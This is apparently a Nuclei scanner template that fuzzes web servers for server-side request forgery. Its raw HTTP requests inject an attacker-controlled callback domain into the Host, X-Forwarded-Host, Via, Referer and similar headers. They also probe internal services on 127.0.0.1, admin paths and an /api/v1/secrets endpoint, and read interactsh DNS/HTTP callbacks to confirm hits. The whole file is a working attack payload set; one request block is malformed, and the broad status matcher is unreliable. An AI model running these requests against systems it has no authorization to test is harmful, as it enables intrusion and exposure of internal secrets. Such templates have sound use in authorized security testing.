id: header-injection

info:
  name: Header SSRF Injection
  author: nullrabbit
  severity: high
  description: Fuzzing headers for OOB SSRF
  tags: fuzz,ssrf

requests:
  - payloads:
      header: ~/proxy-headers.txt

  - raw:
      - |
        GET / HTTP/1.1
        Host: headerinjection.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Host: headerinjection.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}@headerinjection.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
        GET / HTTP/1.1
        Host: {{Hostname}}@headerinjection.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{BaseURL}}@headerinjection.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET @headerinjection.{{MY-DOMAIN}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET {{BaseURL}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET / HTTP/1.1
        Host: headerinjection.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-Host: headerinjection.{{MY-DOMAIN}}
        Connection: close
      - |
        GET /headerinjection.{{MY-DOMAIN}}/headerinjection.{{MY-DOMAIN}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET {{BaseURL}} HTTP/1.1
        Host: headerinjection.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-Host: headerinjection.{{MY-DOMAIN}}
        Via: headerinjection.{{MY-DOMAIN}}
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{BaseURL}}/?headerinjection.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-Host: headerinjection.{{MY-DOMAIN}}
        Via: headerinjection.{{MY-DOMAIN}}
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-For: headerinjection.{{MY-DOMAIN}}
        Referer: {{BaseURL}}/?url=headerinjection.{{MY-DOMAIN}}
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-For: headerinjection.{{MY-DOMAIN}}
        Referer: {{BaseURL}}/?url=headerinjection.{{MY-DOMAIN}}
        True-Client-IP: headerinjection.{{MY-DOMAIN}}
        X-WAP-Profile: http://headerinjection.{{MY-DOMAIN}}/wap.xml
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-For: headerinjection.{{MY-DOMAIN}}
        Expect-Ct: max-age=6*6, report-uri="https://headerinjection.{{MY-DOMAIN}}/expect-ct"
        Connection: close
      - |
        GET /admin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-For: headerinjection.{{MY-DOMAIN}}
        Connection: close
      - |
        POST /admin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-To: headerinjection.{{MY-DOMAIN}}
        Connection: close
      - |
        GET /api/v1/;;/admin/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-For: headerinjection.{{MY-DOMAIN}}
        Connection: close
      - |
        GET /api/;;/admin/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-For: headerinjection.{{MY-DOMAIN}}
        Connection: close
      - |
        GET /api/v1/secrets HTTP/1.1
        Host: 127.0.0.1
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-For: headerinjection.{{MY-DOMAIN}}
        Connection: close
      - |
        CONNECT headerinjection.{{MY-DOMAIN}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-Host: headerinjection.{{MY-DOMAIN}}
        X-Forwarded-For: headerinjection.{{MY-DOMAIN}}
      - |
        POST / HTTP/1.1
        Host: headerinjection.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-For: headerinjection.{{MY-DOMAIN}}
        Connection: close
      - |
        HEAD / HTTP/1.1
        Host: headerinjection.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        X-Forwarded-To: headerinjection.{{MY-DOMAIN}}
        Connection: close
      - |
        HEAD / HTTP/1.1
        Host: {{Hostname}}
        Host: headerinjection.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        HEAD / HTTP/1.1
        Host: headerinjection.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        HEAD / HTTP/1.1
        Host: headerinjection.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET /stats HTTP/1.1
        Host: 127.0.0.1:9901
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET /services HTTP/1.1
        Host: 127.0.0.1:8001
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET /services HTTP/1.1
        Host: 127.0.0.1:8444
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close

    redirects: true
    matchers-condition: or
    matchers:
      - type: status
        status:
          - 200
          - 302
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"
